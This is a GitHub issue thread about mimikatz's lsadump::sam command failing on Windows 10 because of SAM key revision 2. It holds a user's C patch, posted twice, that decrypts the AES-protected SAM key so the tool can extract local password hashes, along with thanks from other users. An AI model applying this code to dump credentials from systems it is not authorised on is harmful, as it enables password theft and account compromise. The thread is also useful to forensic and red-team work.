New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

kuhl_m_lsadump_getSamKey fails for pDomAccF->keys1.Revision==2 #99

Open
uriyay opened this Issue Sep 11, 2017 · 6 comments

Comments

Projects
None yet
6 participants
@uriyay
Copy link

uriyay commented Sep 11, 2017

When I run lsadump::sam on my Windows 10 x64, I get this error:
Unknow Classic Struct Key revision (2)
I found that the error comes from here:

else PRINT_ERROR(L"Unknow Classic Struct Key revision (%u)", pDomAccF->keys1.Revision);

Do you plan to support this revision?

@gentilkiwi

This comment has been minimized.

Copy link
Owner

gentilkiwi commented Oct 18, 2017

Hello :)
I never saw this kind of revision. Do not hesitate to send me file to reproduce !
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-open-an-issue#give-me-files

@TheTrollCaptain

This comment has been minimized.

Copy link

TheTrollCaptain commented Mar 15, 2018

@gentilkiwi Hello!
I got that error too. Console spits out:
"SAMKey : ERROR kuhl_m_lsadump_getSamKey ; Unknow Classic Struct Key revision (2)
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kuhl_m_lsadump_getSamKey KO"

If you're interested, which files would you need to see?

EDIT: It seems to be the SAM file throwing the error... this is the SAM file I extracted from my Windows 10 Enterprise machine
SAM.zip
and SYSTEM file
SYSTEM.zip

@uriyay

This comment has been minimized.

Copy link

uriyay commented Mar 24, 2018

Solved it by adding handling revision 2 in kuhl_m_lsadump_getSamKey:

case 2:
			if(pDomAccF->keys1.Revision == 1)
			{
				MD5Init(&md5ctx);
				MD5Update(&md5ctx, pDomAccF->keys1.Salt, SAM_KEY_DATA_SALT_LENGTH);
				MD5Update(&md5ctx, kuhl_m_lsadump_qwertyuiopazxc, sizeof(kuhl_m_lsadump_qwertyuiopazxc));
				MD5Update(&md5ctx, sysKey, SYSKEY_LENGTH);
				MD5Update(&md5ctx, kuhl_m_lsadump_01234567890123, sizeof(kuhl_m_lsadump_01234567890123));
				MD5Final(&md5ctx);
				RtlCopyMemory(samKey, pDomAccF->keys1.Key, SAM_KEY_DATA_KEY_LENGTH);
				if(!(status = NT_SUCCESS(RtlEncryptDecryptRC4(&data, &key))))
					PRINT_ERROR(L"RtlEncryptDecryptRC4 KO");
			}
			else if (pDomAccF->keys1.Revision == 2) {
				pAesKey = (PSAM_KEY_DATA_AES)&pDomAccF->keys1;
				if (kull_m_crypto_genericAES128Decrypt(sysKey, pAesKey->Salt, pAesKey->data, pAesKey->DataLen, &out, &len))
				{
					if (status = (len == SAM_KEY_DATA_KEY_LENGTH))
						RtlCopyMemory(samKey, out, SAM_KEY_DATA_KEY_LENGTH);
					LocalFree(out);
				}
			}
@TylerD89

This comment has been minimized.

Copy link

TylerD89 commented Mar 26, 2018

Thanks man! Put that to good use!

@0xVIC

This comment has been minimized.

Copy link

0xVIC commented Nov 16, 2018

Thank you, very useful!

@afernandezb92

This comment has been minimized.

Copy link

afernandezb92 commented Nov 16, 2018

Solved it by adding handling revision 2 in kuhl_m_lsadump_getSamKey:

case 2:
			if(pDomAccF->keys1.Revision == 1)
			{
				MD5Init(&md5ctx);
				MD5Update(&md5ctx, pDomAccF->keys1.Salt, SAM_KEY_DATA_SALT_LENGTH);
				MD5Update(&md5ctx, kuhl_m_lsadump_qwertyuiopazxc, sizeof(kuhl_m_lsadump_qwertyuiopazxc));
				MD5Update(&md5ctx, sysKey, SYSKEY_LENGTH);
				MD5Update(&md5ctx, kuhl_m_lsadump_01234567890123, sizeof(kuhl_m_lsadump_01234567890123));
				MD5Final(&md5ctx);
				RtlCopyMemory(samKey, pDomAccF->keys1.Key, SAM_KEY_DATA_KEY_LENGTH);
				if(!(status = NT_SUCCESS(RtlEncryptDecryptRC4(&data, &key))))
					PRINT_ERROR(L"RtlEncryptDecryptRC4 KO");
			}
			else if (pDomAccF->keys1.Revision == 2) {
				pAesKey = (PSAM_KEY_DATA_AES)&pDomAccF->keys1;
				if (kull_m_crypto_genericAES128Decrypt(sysKey, pAesKey->Salt, pAesKey->data, pAesKey->DataLen, &out, &len))
				{
					if (status = (len == SAM_KEY_DATA_KEY_LENGTH))
						RtlCopyMemory(samKey, out, SAM_KEY_DATA_KEY_LENGTH);
					LocalFree(out);
				}
			}

Thank so muchs, its works!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment